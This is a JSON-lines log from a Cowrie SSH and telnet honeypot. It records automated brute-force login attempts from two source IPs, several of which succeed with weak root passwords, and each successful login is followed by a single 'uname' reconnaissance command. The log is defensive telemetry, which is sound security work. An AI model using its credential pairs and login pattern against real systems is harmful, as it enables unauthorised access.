{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:50.329268Z","src_ip":"212.227.125.160","session":"cc1bd3e99bd5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48864,"dst_ip":"1.2.3.4","dst_port":22,"session":"67f6cd4a07c2","protocol":"ssh","message":"New connection: 212.227.235.229:48864 (1.2.3.4:22) [session: 67f6cd4a07c2]","sensor":"my-vps","timestamp":"2025-08-28T06:33:54.961394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:33:54.962251Z","src_ip":"212.227.235.229","session":"67f6cd4a07c2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:33:55.212071Z","src_ip":"212.227.235.229","session":"67f6cd4a07c2"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:33:55.962255Z","src_ip":"212.227.235.229","session":"67f6cd4a07c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:33:56.553489Z","src_ip":"212.227.235.229","session":"67f6cd4a07c2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:33:56.554188Z","src_ip":"212.227.235.229","session":"67f6cd4a07c2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:56.805094Z","src_ip":"212.227.235.229","session":"67f6cd4a07c2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:56.806283Z","src_ip":"212.227.235.229","session":"67f6cd4a07c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39082,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a7b240428ef","protocol":"telnet","message":"New connection: 212.227.235.229:39082 (1.2.3.4:23) [session: 6a7b240428ef]","sensor":"my-vps","timestamp":"2025-08-28T06:34:03.815969Z"}
{"eventid":"cowrie.session.closed","duration":0.0013227462768554688,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:03.817209Z","src_ip":"212.227.235.229","session":"6a7b240428ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58236,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f3f6a8d3f0a","protocol":"ssh","message":"New connection: 212.227.125.160:58236 (1.2.3.4:22) [session: 4f3f6a8d3f0a]","sensor":"my-vps","timestamp":"2025-08-28T06:34:04.603415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:34:04.614313Z","src_ip":"212.227.125.160","session":"4f3f6a8d3f0a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:34:04.825033Z","src_ip":"212.227.125.160","session":"4f3f6a8d3f0a"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:34:05.681982Z","src_ip":"212.227.125.160","session":"4f3f6a8d3f0a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:06.900423Z","src_ip":"212.227.125.160","session":"4f3f6a8d3f0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39152,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae64ccd254dc","protocol":"ssh","message":"New connection: 212.227.235.229:39152 (1.2.3.4:22) [session: ae64ccd254dc]","sensor":"my-vps","timestamp":"2025-08-28T06:34:11.240959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:34:11.248696Z","src_ip":"212.227.235.229","session":"ae64ccd254dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:34:11.493924Z","src_ip":"212.227.235.229","session":"ae64ccd254dc"}
{"eventid":"cowrie.session.closed","duration":31.376755237579346,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:12.263317Z","src_ip":"8.222.212.69","session":"1a7ad01db91c"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:34:12.500946Z","src_ip":"212.227.235.229","session":"ae64ccd254dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40412,"dst_ip":"1.2.3.4","dst_port":23,"session":"11c5bc00c540","protocol":"telnet","message":"New connection: 212.227.125.160:40412 (1.2.3.4:23) [session: 11c5bc00c540]","sensor":"my-vps","timestamp":"2025-08-28T06:34:13.042100Z"}
{"eventid":"cowrie.session.closed","duration":0.0011739730834960938,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:13.043210Z","src_ip":"212.227.125.160","session":"11c5bc00c540"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:13.755008Z","src_ip":"212.227.235.229","session":"ae64ccd254dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57264,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce0b17fdd55d","protocol":"ssh","message":"New connection: 212.227.125.160:57264 (1.2.3.4:22) [session: ce0b17fdd55d]","sensor":"my-vps","timestamp":"2025-08-28T06:34:21.187758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:34:21.188594Z","src_ip":"212.227.125.160","session":"ce0b17fdd55d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:34:21.403831Z","src_ip":"212.227.125.160","session":"ce0b17fdd55d"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:34:22.051677Z","src_ip":"212.227.125.160","session":"ce0b17fdd55d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:23.270118Z","src_ip":"212.227.125.160","session":"ce0b17fdd55d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48670,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0fc0621e47f","protocol":"ssh","message":"New connection: 212.227.235.229:48670 (1.2.3.4:22) [session: f0fc0621e47f]","sensor":"my-vps","timestamp":"2025-08-28T06:34:27.800321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:34:27.801041Z","src_ip":"212.227.235.229","session":"f0fc0621e47f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:34:28.050912Z","src_ip":"212.227.235.229","session":"f0fc0621e47f"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:34:28.806111Z","src_ip":"212.227.235.229","session":"f0fc0621e47f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:30.057945Z","src_ip":"212.227.235.229","session":"f0fc0621e47f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55294,"dst_ip":"1.2.3.4","dst_port":22,"session":"c03d8c2e665d","protocol":"ssh","message":"New connection: 212.227.125.160:55294 (1.2.3.4:22) [session: c03d8c2e665d]","sensor":"my-vps","timestamp":"2025-08-28T06:34:37.896755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:34:37.900828Z","src_ip":"212.227.125.160","session":"c03d8c2e665d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:34:38.125965Z","src_ip":"212.227.125.160","session":"c03d8c2e665d"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:34:39.039636Z","src_ip":"212.227.125.160","session":"c03d8c2e665d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:34:39.527043Z","src_ip":"212.227.125.160","session":"c03d8c2e665d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:34:39.527725Z","src_ip":"212.227.125.160","session":"c03d8c2e665d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:39.757351Z","src_ip":"212.227.125.160","session":"c03d8c2e665d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:39.758723Z","src_ip":"212.227.125.160","session":"c03d8c2e665d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37118,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4937319b4b3","protocol":"ssh","message":"New connection: 212.227.235.229:37118 (1.2.3.4:22) [session: c4937319b4b3]","sensor":"my-vps","timestamp":"2025-08-28T06:34:44.583861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:34:44.584591Z","src_ip":"212.227.235.229","session":"c4937319b4b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:34:45.552731Z","src_ip":"212.227.235.229","session":"c4937319b4b3"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:34:46.306827Z","src_ip":"212.227.235.229","session":"c4937319b4b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:34:46.897292Z","src_ip":"212.227.235.229","session":"c4937319b4b3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:34:46.897993Z","src_ip":"212.227.235.229","session":"c4937319b4b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:47.150496Z","src_ip":"212.227.235.229","session":"c4937319b4b3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:47.151617Z","src_ip":"212.227.235.229","session":"c4937319b4b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47400,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1ad64f5e1d1","protocol":"ssh","message":"New connection: 212.227.125.160:47400 (1.2.3.4:22) [session: e1ad64f5e1d1]","sensor":"my-vps","timestamp":"2025-08-28T06:34:54.359309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:34:54.360287Z","src_ip":"212.227.125.160","session":"e1ad64f5e1d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:34:54.592178Z","src_ip":"212.227.125.160","session":"e1ad64f5e1d1"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:34:55.303817Z","src_ip":"212.227.125.160","session":"e1ad64f5e1d1"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:56.538335Z","src_ip":"212.227.125.160","session":"e1ad64f5e1d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac5d5f7a0b57","protocol":"ssh","message":"New connection: 212.227.235.229:64001 (1.2.3.4:22) [session: ac5d5f7a0b57]","sensor":"my-vps","timestamp":"2025-08-28T06:34:58.893904Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:34:58.992520Z","src_ip":"212.227.235.229","session":"ac5d5f7a0b57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35140,"dst_ip":"1.2.3.4","dst_port":22,"session":"88b3a6bf76ce","protocol":"ssh","message":"New connection: 212.227.235.229:35140 (1.2.3.4:22) [session: 88b3a6bf76ce]","sensor":"my-vps","timestamp":"2025-08-28T06:35:01.008322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:01.009295Z","src_ip":"212.227.235.229","session":"88b3a6bf76ce"}
